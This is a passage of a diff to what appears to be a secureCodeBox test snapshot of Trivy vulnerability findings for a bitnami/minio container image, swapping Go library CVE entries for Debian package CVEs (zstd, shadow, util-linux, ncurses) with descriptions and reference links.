"https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4899", + "installedVersion": "1.4.8+dfsg-2.1", + "packageName": "libzstd1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-4899", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "https://github.com/facebook/zstd/issues/3200", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "https://www.cve.org/CVERecord?id=CVE-2022-4899", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "buffer overrun in util.c", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://avd.aquasec.com/nvd/cve-2022-4899", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-4899", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://github.com/facebook/zstd/issues/3200", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", + ], + }, + "category": "Vulnerability", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "mount", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "6.2+20201114-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "ncurses-base", + "references": [ + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", + ], + }, + "category": "Vulnerability", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "ncurses: segfaulting OOB read", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "ncurses-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", ], }, "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "request smuggling", + "name": "Local users can trigger security-relevant memory corruption via malformed data", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", - ], - }, - "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": 